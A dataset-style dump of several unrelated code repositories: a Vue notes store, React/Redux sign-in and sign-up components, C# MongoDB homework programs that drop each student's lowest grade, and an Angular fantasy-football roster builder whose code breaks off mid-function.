branch_name
stringclasses 149
values | text
stringlengths 23
89.3M
| directory_id
stringlengths 40
40
| languages
listlengths 1
19
| num_files
int64 1
11.8k
| repo_language
stringclasses 38
values | repo_name
stringlengths 6
114
| revision_id
stringlengths 40
40
| snapshot_id
stringlengths 40
40
|
|---|---|---|---|---|---|---|---|---|
refs/heads/master
|
<repo_name>alekseizhezvaev/vue-notes<file_sep>/src/store/modules/note.js
import Vue from "vue";
import {
ADD_MESSAGE,
SET_NOTES,
DELETE_NOTE,
SET_GRID,
SET_SEARCH,
} from "../mutationTypes";
export default {
state: {
search: "",
message: false,
grid: true,
note: {
title: "",
descr: "",
priority: "general",
},
notes: [
{
title: "First Note",
descr: "Description for first note",
date: new Date(Date.now()).toLocaleString(),
priority: "important",
},
{
title: "Second Note",
descr: "Description for second note",
date: new Date(Date.now()).toLocaleString(),
priority: "general",
},
{
title: "Third Note",
descr: "Description for third note",
date: new Date(Date.now()).toLocaleString(),
priority: "general",
},
],
},
mutations: {
[ADD_MESSAGE](state, payload) {
Vue.set(state, "message", payload);
},
[SET_NOTES](state, payload) {
Vue.set(state, "notes", payload);
},
[DELETE_NOTE](state, payload) {
Vue.set(state, "notes", payload);
},
[SET_GRID](state) {
Vue.set(state, "grid", !state.grid);
},
[SET_SEARCH](state, payload) {
Vue.set(state, "search", payload);
},
},
actions: {
addNote({ commit, state }, options) {
const { title, descr, priority } = options;
const notes = [...state.notes];
if (!title) {
commit("ADD_MESSAGE", true);
return;
} else {
commit("ADD_MESSAGE", false);
}
if (priority === "important") {
notes.unshift({
title,
descr,
date: new Date(Date.now()).toLocaleString(),
priority,
});
commit("SET_NOTES", notes);
} else {
notes.push({
title,
descr,
date: new Date(Date.now()).toLocaleString(),
priority,
});
commit("SET_NOTES", notes);
}
},
deleteNote({ commit, state }, index) {
const notes = state.notes;
notes.splice(index, 1);
commit("DELETE_NOTE", notes);
},
setSearchText({ commit }, searchText) {
commit("SET_SEARCH", searchText);
},
},
getters: {
getMessage(state) {
return state.message;
},
getNotes(state, { getSearchText }) {
let val = getSearchText;
if (!val) {
return state.notes;
}
// Small
val = val.trim().toLowerCase();
// Filter
return state.notes.filter((item) => {
if (item.title.toLowerCase().indexOf(val) !== -1) {
return item;
}
});
},
getGrid(state) {
return state.grid;
},
getSearchText(state) {
return state.search;
},
},
};
<file_sep>/src/store/index.js
import Vue from "vue";
import Vuex from "vuex";
Vue.use(Vuex);
import node from "./modules/note";
export default new Vuex.Store({
modules: { node },
});
|
3e448759a12c13c1c0edf39dbd93b5aad022bb9d
|
[
"JavaScript"
] | 2
|
JavaScript
|
alekseizhezvaev/vue-notes
|
fc722ed68372c2f0e666a41fac563bec3af50df9
|
bda1b5a51e0ef01896df90e545322bbb43c0a364
|
refs/heads/master
|
<file_sep>export const appRoot = '/'
export const signIn = '/sign_in'
export const signUp = '/sign_up'
export const home = '/home'<file_sep>import React from 'react'
import { Redirect } from 'react-router-dom'
import PropTypes from 'prop-types'
import { connect } from 'react-redux'
import { isAuth } from 'selectors/auth'
import { currentPath } from 'selectors/router'
import { signIn, signUp, home } from 'constants/routes/ui'
const AuthCheck = ({Component, isAuth , currentPath}) => {
if (!isAuth && [signIn, signUp].every( path => path !== currentPath ) ) {
return <Redirect to={signIn}/>
}
if(isAuth && [signIn, signUp].some( path => path === currentPath) ) {
return <Redirect to={home} />
}
return <Component/>
}
const mapStateToProps = state => {
return {
isAuth : isAuth (state),
currentPath: currentPath(state)
}
}
AuthCheck.propTypes = {
Component: PropTypes.func.isRequired,
isAuth : PropTypes.bool.isRequired,
currentPath: PropTypes.string.isRequired
}
export default connect(mapStateToProps, null)(AuthCheck)<file_sep>import React, { Component } from 'react'
import { withStyles, Grid, TextField, Button, Paper, Typography } from '@material-ui/core'
import PropTypes from 'prop-types'
const emailRegExp = /^(([^<>()\[\]\.,;:\s@\"]+(\.[^<>()\[\]\.,;:\s@\"]+)*)|(\".+\"))@(([^<>()[\]\.,;:\s@\"]+\.)+[^<>()[\]\.,;:\s@\"]{2,})$/i
const emailErrorMsg = 'email is incorrect'
const passwordErrorMsg = 'password length cannot be less than 5 characters'
const styles = theme => ({
flexCenter: {
paddingTop: 'calc(56px + 10%)',
height: '100vh',
boxSizing: 'border-box'
},
formConteiner: {
padding: theme.spacing.unit * 4,
width: '50%',
margin: '0 auto',
minWidth: 200,
maxWidth: 500
}
});
class AuthForm extends Component {
constructor(props){
super(props)
this.state = {
login: this.props.login,
password: <PASSWORD>,
errors: {
login: '',
password: ''
}
}
this.validators = {
'login': (str) => emailRegExp.test(str) ? '' : emailErrorMsg,
'password': (str) => str.length >= 5 ? '' : passwordErrorMsg
}
}
handleSubmit = (event) => {
event.preventDefault();
this.props.handleSubmit({
login: this.state.login,
password: <PASSWORD>
});
}
handleFieldChange = ({target}) => {
const errorMsg = this.validators[target.name](target.value)
this.setState(
prevState => ({
...prevState,
[target.name]: target.value,
errors: {
...prevState.errors,
[target.name]: errorMsg
}
})
)
}
renderServerError = () => {
if(this.props.errorResponse){
return(
<Grid item>
<Typography color='error'>
{this.props.errorResponse + '. Try again'}
</Typography>
</Grid>
)
}
}
isSubmitDisabled = () => {
return !this.state.login || !this.state.password || !!this.state.errors.login || !!this.state.errors.password
}
render(){
const { classes, btnText } = this.props;
const { errors } = this.state;
return (
<div className={classes.flexCenter}>
<Paper className={classes.formConteiner}>
<form onSubmit={this.handleSubmit}>
<Grid container spacing={24} direction='column'>
<Grid item >
<TextField
name='login'
label="Login"
type='email'
error={!!errors['login']}
helperText={errors['login']}
fullWidth autoFocus required
onChange = {this.handleFieldChange}
/>
</Grid>
<Grid item >
<TextField
name='password'
label="Password"
type="password"
error={!!errors['password']}
helperText={errors['password']}
fullWidth required
onChange = {this.handleFieldChange}
/>
</Grid>
{ this.renderServerError() }
<Grid item >
<Button
variant="outlined"
color="primary"
style={{ textTransform: "none" }}
type='submit'
disabled = { this.isSubmitDisabled() }
>
{btnText}
</Button>
</Grid>
</Grid>
</form>
</Paper>
</div>
)
}
}
AuthForm.defaultProps = {
login: '',
password: '',
btnText: 'Submit'
}
AuthForm.propTypes = {
btnText: PropTypes.string,
password: PropTypes.string,
errorResponse: PropTypes.string,
login: PropTypes.string,
classes: PropTypes.object
}
export default withStyles(styles)(AuthForm)<file_sep>import React, { Component } from 'react';
import { Route, Switch, Redirect } from 'react-router-dom';
import { ConnectedRouter } from 'connected-react-router';
import { bindActionCreators } from 'redux'
import { connect } from 'react-redux'
import * as routes from 'constants/routes/ui';
import { getAuthUserRequest } from 'actions/auth'
import HomePage from 'containers/HomePage';
import history from './history';
import SignInPage from 'containers/SignInPage';
import SignUpPage from 'containers/SignUpPage';
import AuthCheck from 'containers/AuthCheck';
import {isUserLoading} from 'selectors/auth';
import {CircleLoader} from 'react-spinners';
import PropTypes from 'prop-types';
import './App.css';
const loaderWrpSyles = {
position: 'absolute',
left: 'calc(50% - 75px)',
top: 'calc(40% - 75px)'
}
class App extends Component {
componentDidMount(){
localStorage.getItem('token') && this.props.actions.getAuthUserRequest()
}
renderApp(){
return (
<ConnectedRouter history={history}>
<Switch>
<Route path={routes.signUp} render={ () => <AuthCheck Component={SignUpPage}/> }/>
<Route path={routes.signIn} render={ () => <AuthCheck Component={SignInPage}/> }/>
<Route path={routes.home} render={ () => <AuthCheck Component={HomePage}/> }/>
<Redirect to ={routes.home} />
</Switch>
</ConnectedRouter>
);
}
renderSpinner(){
return (
<div style={loaderWrpSyles}>
<CircleLoader
sizeUnit={"px"}
size={150}
color={'#36D7B7'}
/>
</div>
)
}
render() {
return this.props.isUserLoading
? this.renderSpinner()
: this.renderApp()
}
}
const mapStateToProps = (state) => ({
isUserLoading: isUserLoading(state)
})
const mapDispatchToProps = (dispatch) => ({
actions: bindActionCreators({
getAuthUserRequest
}, dispatch)
})
App.propTypes = {
isUserLoading: PropTypes.bool.isRequired,
actions: PropTypes.shape({
getAuthUserRequest: PropTypes.func.isRequired
})
}
export default connect(mapStateToProps, mapDispatchToProps)(App);
<file_sep>export const start = (actionType) => `START__${actionType}`;
export const success = (actionType) => `SUCCESS__${actionType}`;
export const fail = (actionType) => `FAIL__${actionType}`
export const startActionWithType = (type, payload) => ({
type: start(type),
payload
})
export const successActionWithType = (type, payload) => ({
type: success(type),
payload
})
export const failActionWithType = (type, error, status ) =>({
type: fail(type),
error,
status
})
<file_sep>import { success, start, fail } from 'helpers/actionProcessTemplaters'
import * as types from 'constants/actionTypes/auth'
const initialState = {
user: {},
isAuth: false,
isAuthorizing: false, // will be using for form spinner in future
isUserLoading: false,
errorResponse: null
}
const auth = (state = initialState, action) => {
switch(action.type){
case( success(types.SIGN_IN) ):
case( success(types.SIGN_UP) ):
return {
...state,
isAuthorizing: false,
isAuth: true,
}
case( success(types.GET_AUTH_USER) ):
return {
...state,
isUserLoading: false,
user: action.payload,
isAuth: true
}
case( start(types.GET_AUTH_USER) ):
return {
...state,
isUserLoading: true
}
case( start(types.SIGN_IN) ):
case( start(types.SIGN_UP) ):
return {
...state,
isAuthorizing: true
}
case( fail(types.GET_AUTH_USER) ):
return {
...state,
isUserLoading: false
}
case( fail(types.SIGN_IN) ):
case( fail(types.SIGN_UP) ):
return {
...state,
isAuthorizing: false,
errorResponse: action.error
}
case( types.CLEAR_AUTH_ERRORS ):
return {
...state,
errorResponse: null
}
default: return state
}
}
export default auth<file_sep>export const signUp = '/auth'
export const signIn = '/login'
export const getAuthUser = '/user'<file_sep>export const SIGN_IN = 'SIGN_IN'
export const SIGN_UP = 'SIGN_UP'
export const LOGOUT = 'LOGOUT'
export const GET_AUTH_USER = 'GET_AUTH_USER'
export const CLEAR_AUTH_ERRORS = 'CLEAR_AUTH_ERRORS'<file_sep>export const isAuth = ({auth}) => auth.isAuth
export const isUserLoading = ({auth}) => auth.isUserLoading
export const isAuthorizing = ({auth}) => auth.isAuthorizing
export const authUser = ({auth}) => auth.user
export const errorResponse = ({auth}) => auth.errorResponse<file_sep>import React, {Component} from 'react'
import { bindActionCreators } from 'redux'
import AuthForm from 'components/AuthForm'
import AuthFormHeader from 'components/AuthFormHeader'
import { signInRequest, clearAuthErrors } from 'actions/auth'
import { connect } from 'react-redux'
import { signUp } from 'constants/routes/ui'
import { errorResponse } from 'selectors/auth'
import PropTypes from 'prop-types'
class SignInPage extends Component {
componentWillUnmount(){
this.props.actions.clearAuthErrors()
}
render(){
return(
<div>
<AuthFormHeader
headerText={'Sign In'}
linkText={'I dont have account'}
linkPath={signUp}
/>
<AuthForm
handleSubmit={this.props.actions.signInRequest}
btnText='Sign in'
errorResponse = {this.props.errorResponse}
/>
</div>
)
}
}
const mapStateToProps = (state) => ({
errorResponse: errorResponse(state),
})
const mapDispatchToProps = (dispatch) => ({
actions: bindActionCreators({
signInRequest,
clearAuthErrors
}, dispatch)
})
SignInPage.propTypes = {
errorResponse: PropTypes.string,
actions: PropTypes.shape({
signUpRequest: PropTypes.func.isRequired,
clearAuthErrors: PropTypes.func.isRequired,
})
}
export default connect(mapStateToProps, mapDispatchToProps)(SignInPage)<file_sep>export const currentPath = ({router}) => router.location.pathname
|
08a43a1e20db28744b6c674bd9da4ec11c39b76f
|
[
"JavaScript"
] | 11
|
JavaScript
|
Kadaverin/incode
|
f8c7c0166791e842db946b43a390cd223721205a
|
b8f96500d08231425b8264204ad2726a8ce62152
|
refs/heads/master
|
<file_sep>using System;
using System.Linq;
using System.Threading.Tasks;
using MongoDB.Bson;
using MongoDB.Bson.Serialization.Attributes;
using MongoDB.Driver;
namespace MongoPractice
{
/// <summary>
/// copied from mongodb university
/// </summary>
public class HW2_1
{
/*Write a program in the language of your choice that will remove the grade of type "homework" with the lowest
* score for each student from the dataset in the handout. Since each document is one grade, it should remove one document per student.
* This will use the same data set as the last problem, but if you don't have it, you can download and re-import.
The dataset contains 4 scores each for 200 students.
First, let's confirm your data is intact; the number of documents should be 800.
use students
db.grades.count()
Hint/spoiler: If you select homework grade-documents, sort by student and then by score, you can iterate through and find
the lowest score for each student by noticing a change in student id. As you notice that change of student_id, remove the document.
To confirm you are on the right track, here are some queries to run after you process the data and put it into the grades collection:
Let us count the number of grades we have:
db.grades.count()
The result should be 600. Now let us find the student who holds the 101st best grade across all grades:
db.grades.find().sort( { 'score' : -1 } ).skip( 100 ).limit( 1 )
The correct result will be:
{ "_id" : ObjectId("50906d7fa3c412bb040eb709"), "student_id" : 100, "type" : "homework", "score" : 88.50425479139126 }
Now let us sort the students by student_id , and score, while also displaying the type to then see what the top five docs are:
db.grades.find( { }, { 'student_id' : 1, 'type' : 1, 'score' : 1, '_id' : 0 } ).sort( { 'student_id' : 1, 'score' : 1 } ).limit( 5 )
The result set should be:
{ "student_id" : 0, "type" : "quiz", "score" : 31.95004496742112 }
{ "student_id" : 0, "type" : "exam", "score" : 54.6535436362647 }
{ "student_id" : 0, "type" : "homework", "score" : 63.98402553675503 }
{ "student_id" : 1, "type" : "homework", "score" : 44.31667452616328 }
{ "student_id" : 1, "type" : "exam", "score" : 74.20010837299897 }
To verify that you have completed this task correctly, provide the identity of the student with the highest average in the class with
following query that uses the aggregation framework. The answer will appear in the _id field of the resulting document.
db.grades.aggregate( { '$group' : { '_id' : '$student_id', 'average' : { $avg : '$score' } } }, { '$sort' : { 'average' : -1 } }, { '$limit' : 1 } )
Enter the student ID below. Please enter just the number, with no spaces, commas or other characters.
*/
public static void Main(string[] args)
{
MainAsync(args).Wait();
Console.ReadKey();
}
static async Task MainAsync(string[] args)
{
var client = new MongoClient();
var db = client.GetDatabase("m101");
var collection = db.GetCollection<Grade>("hw22");
// no student has a negative id, so we'll use that as a safe starting
// point
int currentStudentId = -1;
// Find all the homeworks, sort by StudentId and then Score.
await collection
.Find(x => x.Type == GradeType.homework)
.SortBy(x => x.StudentId).ThenBy(x => x.Score)
.ForEachAsync(async grade =>
{
if (grade.StudentId != currentStudentId)
{
currentStudentId = grade.StudentId;
// The first grade for each student will always be their lowest,
// so delete it...
await collection.DeleteOneAsync(x => x.Id == grade.Id);
}
});
// We haven't gotten to this part in the class yet, but it's the
// translation of the aggregation query from the instructions into .NET.
var result = await collection.Aggregate()
.Group(x => x.StudentId, g => new { StudentId = g.Key, Average = g.Average(x => x.Score) })
.SortByDescending(x => x.Average)
.FirstAsync();
Console.WriteLine(result);
}
private class Grade
{
public ObjectId Id { get; set; }
[BsonElement("student_id")]
public int StudentId { get; set; }
[BsonElement("type")]
[BsonRepresentation(BsonType.String)]
public GradeType Type { get; set; }
[BsonElement("score")]
public double Score { get; set; }
}
public enum GradeType
{
homework,
exam,
quiz
}
}
}
<file_sep>using MongoDB.Bson;
using MongoDB.Driver;
using MongoDB;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace MongoPractice
{
//class Program
//{
// static void Main(string[] args)
// {
// MainAsync(args).Wait();
// Console.WriteLine("Press Enter");
// Console.ReadLine();
// }
// static async Task MainAsync(string[] args)
// {
// //ConnectionString
// var connectionString = "mongodb://localhost:27017";
// //First createt the client. singleton in IoC container or
// //static instance like this are good approaches
// var client = new MongoClient(connectionString);
// //Both the db and col are thread safe so they, like the client, can be stored globaly
// var db = client.GetDatabase("school");
// var col = db.GetCollection<BsonDocument>("students");
// //Method 1
// #region one way to build a collection
// //using (var cursor = await col.Find(new BsonDocument()).ToCursorAsync())
// //{
// // while (await cursor.MoveNextAsync())
// // {
// // foreach (var student in cursor.Current)
// // {
// // if (true)
// // {
// // }
// // Console.WriteLine(student);
// // }
// // }
// //}
// #endregion
// //Method 2, store in memory as list
// #region another way to build a collection
// //var list = await col.Find(new BsonDocument()).ToListAsync();
// //foreach (var doc in list)
// //{
// // Console.WriteLine(doc);
// //}
// #endregion
// //Method 3
// #region Final way to build a collection
// //Foreach document, run the callback method passed into th ForEachAsync
// //await col.Find(new BsonDocument()).ForEachAsync(doc => Console.WriteLine(doc));
// #endregion
// }
//}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using MongoDB;
using MongoDB.Bson;
using MongoDB.Bson.Serialization.Attributes;
using MongoDB.Driver;
namespace MongoPractice
{
public class HW3
{
//This Homework task uses the students.json as a mongo database.
//Importable by cmd: mongoimport --drop -d school -c students filelocation\students.json
//The task is to remove the lowest homework grade from each student, then to find the student with the highest average(all grade types) after dropping lowest homework.
//Answer = _iD = 13
public static void Main(string[] args)
{
MainAsync(args).Wait();
Console.ReadKey();
}
public static async Task MainAsync(string[] args)
{
var client = new MongoClient();
var db = client.GetDatabase("school");
var col = db.GetCollection<Student>("students");
await col.Find(new BsonDocument()).ForEachAsync(async student =>
{
//First get the lowest HW grade by matching the student grade to the gradetype 'homework',
//Then sort the homeworks by score, default is lowest to highest
//Finally the first() grabs the first(lowest) homework and stores it in memory as 'lowestHomeworkGrade'
var lowestHomeworkGrade = student.Grades
.Where(x => x.Type == GradeType.homework)
.OrderBy(x => x.Score).First();
//Then, there are many ways to remove and update the grades array on the student object/document
//option 1: remove it server-side
//await col.UpdateOneAsync
//(
// filter: x => x.Id == student.Id,
// update: Builders<Student>.Update.PullFilter
// (
// field: x => x.Grades,
// filter: score.Score == lowestHomeworkGrade.Score && score.Type == GradeType.homework
// )
//);
//option 2: remove it client-side and replace only the scores
//student.Grades.Remove(lowestHomeworkGrade);
//await col.UpdateOneAsync
// (
// filter: x => x.Id == student.Id,
// update: Builders<Student>.Update.Set(x => x.Grades, student.Grades)
// );
//option3: Remove it Client-side and replace the whole student
student.Grades.Remove(lowestHomeworkGrade);
await col.ReplaceOneAsync
(
filter: x => x.Id == student.Id,
replacement: student
);
});
// translation from the aggregation querry to average out the remaining grades, then sort from highest to lowest grade, then to return the first(highest) average
var result = await col.Aggregate()
.Unwind(x => x.Grades)
.Group(new BsonDocument {
{"_id", "$_id" },
{ "average", new BsonDocument("$avg","$scores.score")}
})
.Sort(new BsonDocument("average", -1))
.FirstAsync();
Console.WriteLine(result);
}
private class Student
{
public int Id { get; set; }
[BsonElement("name")]
public string Name { get; set; }
[BsonElement("scores")]
public List<Grade> Grades { get; set; }
}
private class Grade
{
[BsonElement("type")]
[BsonRepresentation(BsonType.String)]
public GradeType Type {get; set;}
[BsonElement("score")]
public double Score { get; set; }
}
public enum GradeType
{
homework,
exam,
quiz
}
}
}
|
bcbaeb89d9d0dfe9c9b8bea398898d9c0c7e8e30
|
[
"C#"
] | 3
|
C#
|
KWJ2010/MongoPractice
|
6eb3c36b6c9e6185b6932fb724252412deb53d50
|
9d6c83d4ff45d82678d0ac3e04447611b6c0a5ab
|
refs/heads/master
|
<file_sep>import { Component, OnInit, AfterViewInit, ElementRef, Renderer2, ViewChild, Input } from '@angular/core';
import { forkJoin } from 'rxjs';
import { switchMap, switchAll, flatMap } from 'rxjs/operators';
import { Router } from '@angular/router';
import { Player } from '../shared/player';
import { Team } from '../shared/team';
// import { PLAYERS } from '../player_list';
import { TeamService } from "../services/team.service";
import { PlayerService } from "../services/player.service";
@Component({
selector: 'app-players',
templateUrl: './players.component.html',
styleUrls: ['./players.component.css'],
})
export class PlayersComponent implements AfterViewInit {
players: Player[];
player: Player;
teams: Team[] = [];
team: Team;
player_array: any[] = [];
team_name: string;
search: string;
@ViewChild('playerList')
private el: ElementRef;
constructor(private renderer: Renderer2, private teamService: TeamService, private playerService: PlayerService, private router: Router) { }
ngOnInit() { this.getPlayers();
this.teamService.currentTeam
.subscribe(team => this.team = team);
this.teamService.getTeams()
.subscribe(teams => this.teams = teams);
}
ngAfterViewInit() {
}
getPlayers() {
this.playerService.getPlayers()
.subscribe(players => this.players = players);
}
compareFn(t1: Team, t2: Team): boolean {
return t1 && t2 ? t1.id === t2.id : t1 === t2;
}
searchFn(event: any) {
// variables for saving search string and list items
let filter = this.search.toUpperCase();
let ul = document.getElementById('player_list');
let li = ul.getElementsByTagName('li');
// loop through all list items, and hide those who don't match the search query
for (let i=0; i < li.length; i++) {
let name = li[i].getElementsByTagName('p')[0];
let position = li[i].getElementsByTagName('p')[1];
let team = li[i].getElementsByTagName('p')[2];
if (name.innerHTML.toUpperCase().indexOf(filter) > -1) {
li[i].style.display = "";
}
else if (position.innerHTML.toUpperCase().indexOf(filter) > -1) {
li[i].style.display = "";
}
else if (team.innerHTML.toUpperCase().indexOf(filter) > -1) {
li[i].style.display = "";
}
else {
li[i].style.display = "none";
}
}
}
clickPlayer(event: any) {
event.stopPropagation();
event.preventDefault();
let player_html = event.currentTarget.innerHTML;
// console.log(player_html);
let player_name = event.currentTarget.children[1].innerHTML.trim();
console.log(player_name);
if (player_html.indexOf('- QB') != -1 && !document.getElementById('p-1').innerHTML.includes('- QB')) {
let player_li = this.el.nativeElement.children[0];
// copy player into roster list
document.getElementById('p-1').innerHTML = player_html;
// create delete button and attach to player
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.setAttribute(delete_player, 'id', 'p1-del');
this.renderer.addClass(delete_player, 'delete_player');
this.renderer.appendChild(player_li, delete_player);
// remove player elements and delete button, add text
this.renderer.listen(delete_player, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let QB = this.renderer.createText('QB');
this.renderer.appendChild(p, QB)
this.renderer.appendChild(player_li, p);
});
}
else if (player_html.indexOf('- RB') != -1 && document.getElementById('p-2').innerHTML.includes('RB1') && document.getElementById('p-3').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-6').innerHTML.indexOf(player_name) == -1) {
let player_li = this.el.nativeElement.children[1];
// copy player into roster list
document.getElementById('p-2').innerHTML = player_html;
// create delete button and attach to player
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.setAttribute(delete_player, 'id', 'p2-del');
this.renderer.addClass(delete_player, 'delete_player');
this.renderer.appendChild(player_li, delete_player);
// remove player elements and delete button, add text
this.renderer.listen(delete_player, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let RB1 = this.renderer.createText('RB1');
this.renderer.appendChild(p, RB1);
this.renderer.appendChild(player_li, p);
});
}
else if (player_html.indexOf('- RB') != -1 && document.getElementById('p-3').innerHTML.includes('RB2') && document.getElementById('p-2').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-6').innerHTML.indexOf(player_name) == -1) {
let player_li = this.el.nativeElement.children[2];
// copy player into roster list
document.getElementById('p-3').innerHTML = player_html;
// create delete button and attach to player
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.setAttribute(delete_player, 'id', 'p3-del');
this.renderer.addClass(delete_player, 'delete_player');
this.renderer.appendChild(player_li, delete_player);
// remove player elements and delete button, add text
this.renderer.listen(delete_player, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let RB2 = this.renderer.createText('RB2');
this.renderer.appendChild(p, RB2);
this.renderer.appendChild(player_li, p);
});
}
else if (player_html.indexOf('- WR') != -1 && document.getElementById('p-4').innerHTML.includes('WR1') && document.getElementById('p-5').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-6').innerHTML.indexOf(player_name) == -1) {
let player_li = this.el.nativeElement.children[3];
// copy player into slot in table
document.getElementById('p-4').innerHTML = player_html;
// create delete button and attach to player
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.setAttribute(delete_player, 'id', 'p4-del');
this.renderer.addClass(delete_player, 'delete_player');
this.renderer.appendChild(player_li, delete_player);
// remove player elements and delete button, add text
this.renderer.listen(delete_player, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let WR1 = this.renderer.createText('WR1');
this.renderer.appendChild(p, WR1);
this.renderer.appendChild(player_li, p);
});
}
else if (player_html.indexOf('- WR') != -1 && document.getElementById('p-5').innerHTML.includes('WR2') && document.getElementById('p-4').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-6').innerHTML.indexOf(player_name) == -1) {
let player_li = this.el.nativeElement.children[4];
// copy player into roster list
document.getElementById('p-5').innerHTML = player_html;
// create delete button and attach to player
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.setAttribute(delete_player, 'id', 'p5-del');
this.renderer.addClass(delete_player, 'delete_player');
this.renderer.appendChild(player_li, delete_player);
// remove player elements and delete button, add text
this.renderer.listen(delete_player, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let WR2 = this.renderer.createText('WR2');
this.renderer.appendChild(p, WR2);
this.renderer.appendChild(player_li, p);
});
}
else if (player_html.indexOf('- TE') != -1 && !document.getElementById('p-7').innerHTML.includes('- TE') && document.getElementById('p-6').innerHTML.indexOf(player_name) == -1) {
let player_li = this.el.nativeElement.children[6];
// copy player into roster list
document.getElementById('p-7').innerHTML = player_html;
// create delete button and attach to player
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.setAttribute(delete_player, 'id', 'p7-del');
this.renderer.addClass(delete_player, 'delete_player');
this.renderer.appendChild(player_li, delete_player);
// remove player elements and delete button, add text
this.renderer.listen(delete_player, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let TE = this.renderer.createText('TE');
this.renderer.appendChild(p, TE);
this.renderer.appendChild(player_li, p);
});
}
else if ((player_html.indexOf('- RB') != -1 || player_html.indexOf('- WR') != -1 || player_html.indexOf('- TE') != -1) && !document.getElementById('p-6').innerHTML.includes('- RB') && !document.getElementById('p-6').innerHTML.includes('- WR') && !document.getElementById('p-6').innerHTML.includes('- TE') && document.getElementById('p-2').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-3').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-4').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-5').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-7').innerHTML.indexOf(player_name) == -1) {
let player_li = this.el.nativeElement.children[5];
// copy player into roster list
document.getElementById('p-6').innerHTML = player_html;
// create delete button and attach to player
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.setAttribute(delete_player, 'id', 'p6-del');
this.renderer.addClass(delete_player, 'delete_player');
this.renderer.appendChild(player_li, delete_player);
// remove player elements and delete button, add text
this.renderer.listen(delete_player, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let WRT = this.renderer.createText('RB/WR/TE');
this.renderer.appendChild(p, WRT);
this.renderer.appendChild(player_li, p);
});
}
}
saveTeam(event: any) {
// get all list items in team list
let player_nodes = document.getElementById('roster_list').querySelectorAll('img');
if (player_nodes.length >= 7) {
// set team variables
let team_id = this.teams.length == 0 ? 1 : Math.max(...this.teams.map(team => team.id)) + 1;
let team_name = this.team_name;
console.log(this.team_name);
let team_date = new Date();
// get selected players
let player_elements = document.getElementById('roster_list').getElementsByTagName('li');
// push player ids from HTML collection into array
let playerid_array = [];
for (let i=0; i < player_elements.length; i++) {
playerid_array.push(player_elements[i].children[1].id);
};
// call getPlayer method from player service and push retrieved player observables into observables array
let observables = [];
for (let i=0; i < playerid_array.length; i++) {
observables.push(this.playerService.getPlayer(playerid_array[i]));
}
// subscribe to player observables, create team object
forkJoin(observables)
.subscribe(player_array => {
this.player_array = player_array;
this.team = {id: team_id, name: team_name, created: team_date, players: this.player_array};
console.log(this.team);
// call addTeam method from team service and push team object into team array, call getTeams method from team service
this.teamService.addTeam(this.team)
.subscribe(team => {
this.teams.push(team);
});
this.teamService.getTeams()
.subscribe(teams => this.teams = teams);
console.log(this.teams);
alert("Team Saved!");
});
}
else {
alert("Please choose a complete team.");
this.router.navigate(['/']);
}
}
sendTeam(event: any) {
this.teamService.sendTeam(this.team);
}
loadTeam(event: any) {
// empty roster list
document.getElementById('roster_list').innerHTML = '';
console.log(this.teams);
// create table slots and delete buttons and place players
for (let i=0; i < this.team.players.length; i++) {
let load_player = this.renderer.createElement('li');
this.renderer.setAttribute(load_player, 'class','list-group-item');
this.renderer.setAttribute(load_player, 'id','p-' + [i+1]);
let id = this.team.players[i].id.toString();
let name = this.team.players[i].name;
let position = this.team.players[i].position;
let player_team = this.team.players[i].team;
let logo = this.team.players[i].logo;
let alt = this.team.players[i].alt;
let logo_element = this.renderer.createElement("img");
this.renderer.setAttribute(logo_element, 'src',logo);
this.renderer.setAttribute(logo_element, 'class','logo');
this.renderer.setAttribute(logo_element, 'alt',alt);
this.renderer.appendChild(load_player, logo_element);
let name_element = this.renderer.createElement('p');
let position_element = this.renderer.createElement('p');
let team_element = this.renderer.createElement('p');
this.renderer.setAttribute(name_element, 'id', id);
this.renderer.setAttribute(name_element, 'class','selected_player');
name_element.innerHTML = ' ' + name + ' ';
position_element.innerHTML = '-' + ' ' + position + ' ' + '-';
team_element.innerHTML = ' ' + player_team + ' ';
this.renderer.appendChild(load_player, name_element);
this.renderer.appendChild(load_player, position_element);
this.renderer.appendChild(load_player, team_element);
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.appendChild(load_player, delete_player);
